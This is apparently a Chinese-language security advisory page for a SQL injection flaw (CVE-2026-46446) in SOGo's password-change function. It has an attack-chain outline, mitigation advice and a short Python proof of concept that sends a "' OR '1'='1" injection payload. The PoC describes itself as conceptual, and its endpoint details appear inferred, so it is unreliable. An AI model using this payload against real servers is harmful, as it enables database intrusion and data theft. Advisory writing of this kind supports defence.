IPBUF安全漏洞报告
English
CVE-2026-46446 CVSS 7.1 高危

CVE-2026-46446 SOGo SQL注入漏洞

披露日期: 2026-05-14
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-46446
漏洞类型
SQL注入
CVSS评分
7.1 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
SOGo

相关标签

SQL注入SOGoWeb安全PostgreSQLMariaDBCVE-2026-46446

漏洞概述

SOGo群件软件在5.12.7之前的版本中存在高危SQL注入漏洞。该漏洞特定于使用PostgreSQL或MariaDB数据库,且以明文存储密码的配置场景。攻击者可利用changePasswordForLogin接口的缺陷,通过构造特殊的SQL语句,在低权限条件下执行任意数据库命令,进而窃取敏感数据或破坏系统完整性。

技术细节

该漏洞的根本原因在于SOGo在处理密码变更请求时,未对用户输入进行充分的过滤,特别是在特定数据库架构下。当系统配置为明文存储密码(c_password字段)并使用PostgreSQL或MariaDB时,changePasswordForLogin函数中的代码逻辑存在拼接漏洞。攻击者利用低权限用户身份,向该接口发送包含恶意SQL代码的请求。由于后端采用了不安全的字符串拼接方式构建SQL查询,注入的恶意代码会被数据库服务器直接执行。利用此漏洞,攻击者可以绕过认证限制,提取数据库中的敏感信息(如邮件、联系人),甚至利用数据库漏洞进一步控制服务器。

攻击链分析

STEP 1
侦察
攻击者识别目标SOGo版本低于5.12.7,并确认后端使用了PostgreSQL或MariaDB数据库且配置为明文存储密码。
STEP 2
获取访问权限
攻击者注册或通过弱口令获取一个低权限用户账号(满足CVSS PR:L条件)。
STEP 3
漏洞利用
攻击者向changePasswordForLogin接口发送特制的POST请求,在c_password参数中注入恶意SQL代码。
STEP 4
执行攻击
后端数据库执行注入的SQL语句,攻击者据此窃取数据、修改密码或获取更高的系统权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://target-sogo-server/SOGo/connect/changePassword" session = requests.Session() # Attacker credentials (Low privilege required) login_payload = { "userName": "low_priv_user", "password": "password123", "domain": "sogo.local" } # 1. Authenticate to get a session session.post("http://target-sogo-server/SOGo/connect", data=login_payload) # 2. Exploit SQL Injection in changePasswordForLogin # The vulnerability occurs in the 'c_password' parameter when cleartext passwords are used. # Payload attempts to inject a boolean-based SQL statement. exploit_payload = { "c_password": "' OR '1'='1", # Injection payload "newPassword": "hacked", "confirmPassword": "hacked" } response = session.post(target_url, data=exploit_payload) if response.status_code == 200: print("[+] Payload sent successfully. Check for database errors or behavioral changes.") else: print("[-] Request failed.") # Note: This is a conceptual PoC demonstrating the injection point based on the CVE description.

影响范围

SOGo < 5.12.7

防御指南

临时缓解措施
建议立即升级至SOGo 5.12.7或更高版本以修复此漏洞。如果无法立即升级,请务必检查数据库配置,确保密码经过加密处理(非明文),并严格限制Web应用连接数据库的账户权限,仅保留必要的读写操作。同时,应密切监控数据库日志中是否存在异常的SQL查询活动。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表